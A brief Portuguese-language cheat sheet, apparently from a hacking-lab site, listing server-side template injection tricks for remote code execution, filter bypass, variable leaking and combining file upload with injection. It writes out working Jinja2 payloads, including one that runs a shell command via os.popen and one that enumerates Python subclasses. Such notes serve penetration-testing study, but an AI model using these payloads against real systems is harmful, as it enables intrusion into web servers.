root@hacklab:~$
[]
ONLINE

SSTI - Tricks

  • RCE via SSTI: Teste payloads que executam comandos, como {{ config.items() }}, {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}.
  • Bypass de Filtros: Use variações de sintaxe e encoding para burlar restrições.
  • Leak de Variáveis: Liste variáveis e funções disponíveis no template ({{''.__class__.__mro__[1].__subclasses__()}}).
  • Upload + SSTI: Combine upload de arquivos com SSTI para execução remota.